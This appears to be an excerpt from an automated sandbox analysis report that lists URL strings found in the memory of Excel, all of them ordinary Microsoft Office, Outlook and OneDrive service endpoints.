Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
Source: EXCEL.EXE, 00000000.00000003.536474364.000000000F4F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.432672705.000000000F449000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com?&
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordRV~
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://officeapps.live.com
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com0
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com6
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com8
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comJ
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comM
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comN
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comX
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comZ
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comd
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comf
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comi
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.coml
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comr
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.coms.dll
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comx
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://onedrive.live.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/embed?iao
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://osi.office.net
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netX
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netj
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://outlook.office.com
Source: EXCEL.EXE, 00000000.00000003.536668437.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629731941.0000000012E0B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://outlook.office.com/
Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://outlook.office365.com
Source: EXCEL.EXE, 00000000.00000003.536668437.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629731941.0000000012E0B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://outlook.office365.com/
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/3m
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonhw
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
